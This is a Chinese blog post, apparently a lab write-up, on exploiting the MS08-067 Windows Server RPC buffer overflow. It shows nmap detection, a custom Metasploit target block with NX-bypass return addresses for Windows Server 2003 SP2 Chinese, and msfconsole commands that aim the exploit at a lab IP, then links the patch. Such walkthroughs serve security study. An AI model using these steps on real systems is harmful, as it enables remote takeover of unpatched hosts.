MS08-067 RPC请求缓冲区溢出漏洞利用

最新推荐文章于 2024-03-15 11:37:56 发布
最新推荐文章于 2024-03-15 11:37:56 发布
阅读量1.8k 收藏 5
点赞数
分类专栏: 漏洞复现 文章标签: 安全 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/109672737
版权

目录

漏洞描述

  Windows 系统上的服务器服务中存在一个远程执行代码漏洞。 该漏洞是由于服务不正确地处理特制的 RPC 请求导致的。 成功利用此漏洞的攻击者可以完全控制受影响的系统。

影响系统

  • Windows Vista
  • Windows 2000 Service
  • Windows Server 2008
  • Windows Server 2003
  • Windows XP

漏洞检测

nmap进行漏洞检测

#nmap 目标ip --script=smb-vuln-ms08-067.nse
nmap 192.168.234.129 --script=smb-vuln-ms08-067.nse

提示VULNERABLE表示漏洞存在

在这里插入图片描述

漏洞利用

漏洞利用工具为msf,我复现的系统为Windows Server 2003 SP2 中文版。但我发现msf中没有中文版 的 exp 框架。
在这里插入图片描述

添加漏洞利用代码:

#修改msf漏洞利用代码
vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08_067_netapi.rb

添加以下内容:

 [ 'Windows 2003 SP2 Chinese (NX)',
   {
	  'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)
	  'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)
	  'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)
	  'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL
          'Scratch'   => 0x00020408,
   }
],

在这里插入图片描述

#进入msf
msfconsole

#查找漏洞框架并调用
search ms08-067
use exploit/windows/smb/ms08_067_netapi

查看系统exp框架时,可以看到我们添加的windwos 2003 SP2 Chinese

show targets

在这里插入图片描述

设置好目标ip及其他参数,即可开始攻击

set target 1
set rhost 192.168.234.129
show options

在这里插入图片描述
在这里插入图片描述

漏洞加固

微软已发布MS08-067补丁:
http://technet.microsoft.com/zh-cn/security/bulletin/ms08-067

凝聚力安全团队
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试基础(四) MS08-067 漏洞攻击
Venus_majian
06-20 586
1. 漏洞介绍 2. 环境搭建 3. 渗透测试 4. 主机利用
MS08-067源码分析
04-04
3. **缓冲区溢出**:MS08-067漏洞主要涉及到缓冲区溢出,这是常见的安全问题。通过分析源码,我们可以看到如何防止这类溢出,如何正确地处理输入数据,以及如何设计有效的溢出防护机制。 4. **漏洞利用技术**:研究...
Windows RPC运行时漏洞事后总结
AKAMAI_CHINA的博客
01-10 811
2022年4月前后,Windows RPC运行时被曝出存在远程代码执行漏洞,当时曾引起很多人广泛关注。微软很快做出反应,发布补丁程序进行修补。这次事件中,Windows远程过程调用(RPC)运行时共出现三个关键漏洞:CVE-2022-24492、CVE-2022-24528和CVE-2022-26809。本文主要将介绍其中两个漏洞的信息,它们所产生的影响和范围,以及可行的缓解措施。Akamai最近还撰写了一篇有关RPC筛选器的指南,该工具可以限制并阻止Windows计算机之间的RPC流量。
MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现
Shadow_DAI_990101的博客
09-14 3351
SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口,SMB使用了NetBIOS的API。等我学会了再写吧…可以先参考如下文章MS08-067复现与简单分析漏洞考古:MS08-067详细分析。
MS08-067缓冲区溢出漏洞复现
lmxstjghhh的博客
11-13 203
MS08-067缓冲区溢出漏洞复现
Windows Server服务 RPC 缓冲区远程溢出漏洞ms08-067复现
qq_63539335的博客
06-27 809
渗透练习:Windows Server服务 RPC 缓冲区远程溢出漏洞(ms08-067)复现,nmap,msf模块利用
MS08-067 漏洞利用安全加固
最新发布
theRavensea
03-15 2151
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。 Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。NetPathCanonicalize 函数在远程访问其他主机时会调用 NetpwCanoni
漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】
qq_44394952的博客
01-19 5460
1.漏洞详情信息表: 2.系统和软件环境配置详情信息表: 虚拟机软件:vmware workstation 14 系统:Windows XP 系统、Kali系统 环境配置:(1)受害机:Windows XP SP3镜像(2)攻击机:Kali系统 3.漏洞还原详细步骤: (1)虚拟机受害机系统和攻击机系统之间能够相互通信 攻击机:Kali-192.168.110.129 目标机:Windows XP-192.168.110.128 (2)打开Windows XP系统,确定445端口开启。 输入“nets
缓冲区溢出MS08-067漏洞复现
qq_51331767的博客
11-09 347
MS08-067漏洞全称是“Windows Server 服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上受到RPC请求时,该漏洞会允许远程代码执行,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。
网安学习日记-MS08-067远程溢出漏洞学习(CVE-2008-4250)
末班车的博客
03-10 711
MS08-067远程代码执行漏洞详细利用过程与发现思路
MS08-067批量溢出C源代码
11-16
总之,MS08-067批量溢出C源代码涉及到的关键技术点包括缓冲区溢出原理、C语言的内存操作、堆栈布局分析、EIP控制以及shellcode的使用。通过理解和实践这些概念,我们可以更深入地了解网络攻击手段,并为系统的安全...
MS08-067改进
10-29
MS08-067的情况下,攻击者可以通过构造特定的RPC请求,使Server Service服务中的缓冲区溢出,进而执行恶意代码。 详细解释一下,Server Service是Windows操作系统中的一个重要组件,它处理各种网络连接和协议,...
MS08067漏洞溢出攻击
11-21
MS08067漏洞溢出攻击
ms8067漏洞溢出工具
10-28
【标题】"ms8067漏洞溢出工具"指的是针对MS08-067漏洞的利用工具,这是一个在Windows操作系统中广泛知名的漏洞。该工具通常被安全研究人员和黑客用于测试系统安全性或进行非法入侵。 【描述】提到这个工具“适合dos...
MS17-010(永恒之蓝) 漏洞检测及利用教程
凝聚力安全团队
11-13 6042
漏洞描述: 攻击者向 Microsoft 服务器消息块SMB服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 影响版本: - Windows Vista - Windows 7 - Windows 8.1 - Windows RT 8.1 - Windows 10 - Windows Server 2008 和 Windows Server 2008 R2 - Windows Server 2012 和 Windows Server 201
CVE-2020-1938 Apache-Tomcat-Ajp (幽灵猫)文件包含漏洞复现
凝聚力安全团队
11-15 4570
目录漏洞描述影响版本漏洞环境搭建漏洞利用任意文件读取本地包含命令执行,测试ping dnslog反弹shell漏洞加固参考文章 漏洞描述   该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 影响版本 Apache Tomcat 6 Apache Tomcat 7 &lt
CVE-2012-2122 Mysql身份认证漏洞及利用
凝聚力安全团队
01-25 4202
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测msf漏洞利用漏洞加固建议参考链接 漏洞描述   当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
凝聚力安全团队
11-20 4113
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
Metasploit利用MS08-067与MS10-018漏洞:Windows服务器入侵与防护策略
本文档主要关注两个与Metasploit相关的漏洞利用实战:MS08-067 RPC请求缓冲区溢出漏洞和MS10-018 IE畸形对象操作内存破坏漏洞。 1. MS08-067 RPC请求缓冲区溢出漏洞: - 漏洞背景:这个漏洞存在于Microsoft ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值